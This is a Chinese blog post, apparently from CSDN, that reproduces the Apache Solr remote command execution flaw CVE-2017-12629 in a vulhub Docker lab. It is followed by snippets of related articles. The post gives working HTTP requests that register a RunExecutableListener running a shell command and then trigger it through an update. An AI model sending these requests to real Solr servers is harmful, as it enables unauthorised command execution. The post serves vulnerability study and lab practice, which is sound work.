Apache Solr 远程命令执行漏洞(CVE-2017-12629)

最新推荐文章于 2025-03-14 18:10:44 发布
最新推荐文章于 2025-03-14 18:10:44 发布
阅读量2.6k 收藏 2
点赞数 1
分类专栏: 中间件漏洞复现 文章标签: solr apache 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zy15667076526/article/details/109958623
版权

声明

好好学习,天天向上

漏洞描述

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。

本环境测试RCE漏洞。

影响范围

Apache Solr < 7.1
Apache Lucene < 7.1(很多组件都用到这个,比如ES)

复现过程

这里使用7.0.1版本

使用vulhub

cd /app/vulhub-20201028/solr/CVE-2017-12629-RCE

使用docker启动

docker-compose up -d

启动后可访问IP:8983,需要稍等一会哦

首先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数:

POST /solr/demo/config HTTP/1.1
Host: 192.168.239.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 169

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/cve-2017-12629"]}}

在这里插入图片描述

然后进行update操作,触发刚才添加的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.239.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

在这里插入图片描述

进入容器,可见/tmp/success已成功创建:

在这里插入图片描述

使用完后关闭镜像

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 759
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache SolrApache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。
Apache Solr 远程命令执行漏洞复现(CVE-2017-12629
0xSec
12-26 1142
Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口。用户可以通过 http 请求,向搜索引擎服务器提交一定格式的 XML 文件,生成索引;也 可以通过 Http Get 操作提出查找请求,并得到 xml/json 格式的返回结果。Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。
Log4j2漏洞实战:黑客是如何利用它的?
最新发布
gysadsadsa的博客
03-14 914
apache log4j通过定义每⼀条⽇志信息的级别能够更加细致地控制⽇志⽣成地过程,受影响地版本中存在JNDI注⼊漏洞,导致⽇志在记录⽤户输⼊地数据时,触发了注⼊漏洞,该漏洞可导致远程代码执⾏,且利⽤条件低,影响范围⼴,⼩到⽹站,⼤到可联⽹的⻋都受影响,建议使⽤了相关版本的应⽤或者插件,尽快升级修补,做好相关⽅措施,避免造成不必要的损失。log4j2 是Apache的⼀个java⽇志框架,我们借助它进⾏⽇志相关操作管理,然⽽在2021年末log4j2爆出了远程代码执⾏漏洞,属于严重等级的漏洞
漏洞复现----3、Apache Solr 远程命令执行漏洞CVE-2017-12629
七天
11-30 2418
文章目录一、Apache Solr 简介二、CVE-2017-12629简介三、漏洞复现3.1、使用postCommit3.2、使用newSearcher 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Lucene
Apache Solr远程代码执行漏洞CVE-2017-12629
3569
01-22 5772
http://www.freebuf.com/sectool/159970.html 一 漏洞简介 Apache SolrApache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。 二 漏洞利用 2.1. 环境介绍 Ubuntu14 64位环境(sol
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
CVE-2017-12629-Apache Solr远程代码执行漏洞分析
旺仔Sec&blog
09-20 1503
Apache Solr 是一个流行的开源企业搜索平台,广泛应用于各种企业级应用和网站中。2017 年,该漏洞被发现并公布,引起了广泛关注。 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
HEAVEN569的博客
06-21 1423
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
Apache Solr远程命令执行漏洞深度剖析与防御实践(CVE-2017-12629
kp00000的博客
12-31 735
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 776
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
漏洞复现|Apache Solr 远程命令执行漏洞
weixin_42282189的博客
10-19 573
作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 CVE-2017-12629 0x01 漏洞描述 Apache Solr 是一个基于Java语言利用HTTP&Apache Lucene 来实现的开源的搜索服务器。原理是文档通过Http利用XML加到一个搜索集合中,查询是通过 http收到一个XML/JSON响应来进行查询操作。 0x02 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 0x03 测试环.
Apache solr XXE 漏洞CVE-2017-12629
m0_73605862的博客
12-01 994
(排查了端口被占的问题,发现是可以打开目录的,是因为防火墙没关,后面关了就可以了)5.然后要用到另一个服务器上面的dtd文件,所以这里需要用http-server搭建一个服务器,先开放一个端口,然后在共享文件夹里面写入一个1.dtd。3.进入到核心的查看界面,是json的查看方式,第二张的表达方式会更直观,可以看到xxe漏洞在哪里,在那个demo那个地方。2.开始看wp的时候没有看懂为什么是core,然后去了解了一下solr的核心这个概念,然后发现是一个启动的配置。然后就出来了etc/passwd。
CVE-2017-12629Apache Solr XXE&&RCE
qq_61553520的博客
05-13 1274
pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1。
[漏洞复现]Apache Solr Velocity模板远程代码执行
a1b2c3是弱口令
10-31 1058
Apache Solr Velocity模板远程代码执行 0X00 漏洞描述 近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞.该漏洞可以攻击最新版本的Solr.目前该漏洞利用详情已经广泛流传于Github以及各大安全群,且公开的EXP可以执行任意命令并自带回显.官方暂未发布补丁. 0X01 漏洞CVE 暂无 0X02 影响范围 包括但不限于8.2...
(CVE-2017-12629)Apache Solr远程代码执行复现
EC_Carrot的博客
03-08 393
漏洞介绍 Apache Solr Apache Solr是一个来自Apache Lucene(Lucene是一个开源的搜索引擎软件库),使用Java语言编写的开源的企业搜索平台,其主要功能包括全文搜索,实时索引,动态集群等功能。原理大致是文档通过HTTP利用XML加到一个搜索集合中,查询该集合也是通过HTTP收到一个XML/JSON响应来实现,在7.1.0及之前版本存在远程命令执行漏洞(RCE)Apache ZooKeeper Apache ZooKeeper是一个Apache基金会的一个软件项目,用于
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值